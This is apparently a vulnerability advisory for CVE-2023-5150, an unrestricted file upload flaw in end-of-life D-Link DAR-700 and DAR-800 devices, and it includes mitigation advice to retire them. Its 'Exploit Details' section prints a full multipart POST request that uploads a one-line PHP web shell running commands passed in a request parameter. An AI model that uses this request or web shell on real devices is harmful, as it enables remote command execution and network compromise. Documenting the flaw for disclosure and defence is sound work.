Summary: A critical vulnerability, identified as CVE-2023-5150, has been found in D-Link DAR-700 and DAR-800 devices up to the 20151231 version. It affects an unknown function in the /useratte/web.php file, and allows for unrestricted uploads by manipulating the file_upload argument. This vulnerability only affects products that are no longer supported by the maintainer. The vendor confirmed that these devices are end-of-life, and should be retired and replaced.

Introduction

The Exploit Database Advisory team recently discovered a critical vulnerability in D-Link DAR-700 and DAR-800 devices with software versions up to 20151231. The vulnerability, labeled as CVE-2023-5150, has been assigned the identifier VDB-240246. This vulnerability affects an unknown function in the file named /useratte/web.php, and permits attackers to perform an unrestricted file upload by manipulating the file_upload argument.

Exploit Details

The vulnerability allows remote attackers to upload arbitrary files and execute commands on the affected devices by launching the attack remotely.

Here is a code snippet illustrating the vulnerability

POST /useratte/web.php HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----x
Content-Length: 200
Connection: close

------x
Content-Disposition: form-data; name="file_upload"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST["cmd"]); ?>
------x--

By exploiting this vulnerability, malicious actors can potentially gain unauthorized access to sensitive information, compromise the network, and execute commands remotely on affected devices.

References

- Original Advisory: Exploit Database VDB-240246
- Mitigation: The vendor, D-Link, was contacted regarding the vulnerability and they confirmed that the affected devices (DAR-700 and DAR-800) have reached their end-of-life (EOL). As a result, no patches will be provided for these devices and they should be retired and replaced with newer, supported models.

Conclusion

D-Link DAR-700 and DAR-800 devices are no longer supported and are susceptible to CVE-2023-5150, a critical vulnerability that permits unrestricted file uploads and remote execution. It is strongly recommended that affected users retire the devices and replace them with newer models that are still supported by the vendor.

*Note: This post discusses a vulnerability in devices that are no longer supported by their manufacturer. The information provided should be used solely for educational purposes. Any misuse of the information may result in legal consequences. Always ensure that your networks and devices are updated regularly and are using the latest security measures.*

Timeline

Published on: 09/25/2023 02:15:10 UTC
Last modified on: 11/07/2023 04:23:32 UTC